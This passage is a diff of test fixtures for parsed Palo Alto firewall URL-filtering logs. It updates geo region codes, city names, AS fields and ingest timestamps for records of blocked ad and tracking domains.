16:44:37,28185,1,52998,443,41060,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7741,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:37.000-05:00", "timezone": "America/New_York", @@ -2795,22 +2715,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -2941,7 +2856,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691746200Z", + "ingested": "2021-12-14T14:50:40.980243017Z", "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28201,1,52999,443,9058,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7742,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:37.000-05:00", "timezone": "America/New_York", @@ -2969,22 +2884,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -3115,7 +3025,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691751400Z", + "ingested": "2021-12-14T14:50:40.980243356Z", "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28148,1,53001,443,54846,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7743,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:37.000-05:00", "timezone": "America/New_York", @@ -3143,22 +3053,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -3289,7 +3194,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691757800Z", + "ingested": "2021-12-14T14:50:40.980243711Z", "original": "Nov 30 16:44:37 PA-220 1,2018/11/30 16:44:37,012801096514,THREAT,url,2049,2018/11/30 16:44:37,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:37,28121,1,53002,443,52731,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7744,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:37.000-05:00", "timezone": "America/New_York", @@ -3317,22 +3222,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -3463,7 +3363,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691761900Z", + "ingested": "2021-12-14T14:50:40.980244067Z", "original": "Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28228,1,53003,443,15165,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7745,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:38.000-05:00", "timezone": "America/New_York", @@ -3491,22 +3391,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -3637,7 +3532,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691766900Z", + "ingested": "2021-12-14T14:50:40.980244406Z", "original": "Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28196,1,53004,443,53918,443,0x403000,tcp,block-url,\"b.scorecardresearch.com/\",(9999),business-and-economy,informational,client-to-server,7746,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:38.000-05:00", "timezone": "America/New_York", @@ -3665,22 +3560,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -3811,7 +3701,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691770900Z", + "ingested": "2021-12-14T14:50:40.980244751Z", "original": "Nov 30 16:44:38 PA-220 1,2018/11/30 16:44:38,012801096514,THREAT,url,2049,2018/11/30 16:44:38,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:38,28007,1,53000,443,40792,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7747,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:38.000-05:00", "timezone": "America/New_York", @@ -3839,22 +3729,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -3985,7 +3870,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691774900Z", + "ingested": "2021-12-14T14:50:40.980245099Z", "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28117,1,53006,443,54044,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7748,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", @@ -4013,22 +3898,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -4159,7 +4039,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691782700Z", + "ingested": "2021-12-14T14:50:40.980245551Z", "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28109,1,53007,443,19544,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7749,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", @@ -4187,22 +4067,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -4333,7 +4208,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691788200Z", + "ingested": "2021-12-14T14:50:40.980245895Z", "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28260,1,53008,443,13462,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7750,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", @@ -4361,22 +4236,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -4507,7 +4377,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691794800Z", + "ingested": "2021-12-14T14:50:40.980246244Z", "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28275,1,53010,443,44892,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7752,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", @@ -4535,22 +4405,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -4681,7 +4546,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691801100Z", + "ingested": "2021-12-14T14:50:40.980246589Z", "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28266,1,53011,443,16487,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7753,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", @@ -4709,22 +4574,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -4855,7 +4715,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691807400Z", + "ingested": "2021-12-14T14:50:40.980246945Z", "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28294,1,53012,443,23952,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7754,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", @@ -4883,22 +4743,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -5029,7 +4884,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691813700Z", + "ingested": "2021-12-14T14:50:40.980247291Z", "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28248,1,53013,443,2810,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7755,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", @@ -5057,22 +4912,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -5203,7 +5053,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691820Z", + "ingested": "2021-12-14T14:50:40.980247637Z", "original": "Nov 30 16:44:46 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28274,1,53014,443,13272,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7756,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", @@ -5231,22 +5081,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -5377,7 +5222,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691826300Z", + "ingested": "2021-12-14T14:50:40.980248001Z", "original": "Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28285,1,53022,443,8663,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7762,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", @@ -5405,22 +5250,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -5551,7 +5391,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691832800Z", + "ingested": "2021-12-14T14:50:40.980248342Z", "original": "Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28306,1,53023,443,55738,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7763,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", @@ -5579,22 +5419,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -5725,7 +5560,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691839300Z", + "ingested": "2021-12-14T14:50:40.980248706Z", "original": "Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28116,1,53024,443,10650,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7764,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", @@ -5753,22 +5588,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -5899,7 +5729,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691845600Z", + "ingested": "2021-12-14T14:50:40.980249058Z", "original": "Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28214,1,53025,443,44087,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7765,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", @@ -5927,22 +5757,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -6073,7 +5898,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691852100Z", + "ingested": "2021-12-14T14:50:40.980249515Z", "original": "Nov 30 16:44:47 PA-220 1,2018/11/30 16:44:46,012801096514,THREAT,url,2049,2018/11/30 16:44:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:46,28080,1,53026,443,15915,443,0x403000,tcp,block-url,\"consent.cmp.oath.com/\",(9999),business-and-economy,informational,client-to-server,7766,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:46.000-05:00", "timezone": "America/New_York", @@ -6101,22 +5926,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -6247,7 +6067,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691858600Z", + "ingested": "2021-12-14T14:50:40.980249863Z", "original": "Nov 30 16:44:53 PA-220 1,2018/11/30 16:44:53,012801096514,THREAT,url,2049,2018/11/30 16:44:53,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:53,28318,1,53041,443,41165,443,0x403000,tcp,block-url,\"cdn.taboola.com/\",(9999),business-and-economy,informational,client-to-server,7768,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:53.000-05:00", "timezone": "America/New_York", @@ -6275,22 +6095,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -6421,7 +6236,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691864900Z", + "ingested": "2021-12-14T14:50:40.980250203Z", "original": "Nov 30 16:44:54 PA-220 1,2018/11/30 16:44:54,012801096514,THREAT,url,2049,2018/11/30 16:44:54,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:54,28300,1,53040,443,54133,443,0x403000,tcp,block-url,\"rules.quantcount.com/\",(9999),business-and-economy,informational,client-to-server,7769,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": "2018-11-30T16:44:54.000-05:00", "timezone": "America/New_York", @@ -6449,22 +6264,17 @@ }, "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", "country_iso_code": "CN", "country_name": "China", "name": "United States", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 } }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" - } - }, "port": 443, "ip": "175.16.199.1" }, @@ -6595,7 +6405,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:43:44.691871300Z", + "ingested": "2021-12-14T14:50:40.980250550Z", "original": "Nov 30 16:44:59 PA-220 1,2018/11/30 16:44:58,012801096514,THREAT,url,2049,2018/11/30 16:44:58,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:44:58,28339,1,53093,443,8485,443,0x403000,tcp,block-url,\"srv-2018-11-30-22.config.parsely.com/\",(9999),business-and-economy,informational,client-to-server,7770,0x2000000000000000,192.168.0.0-192.168.255.255,United States,0,,0,,,0,,,,,,,,0,0,0,0,0,,PA-220,,,,,0,,0,,N/A,unknown,AppThreat-0-0,0x0,0,4294967295,", "created": 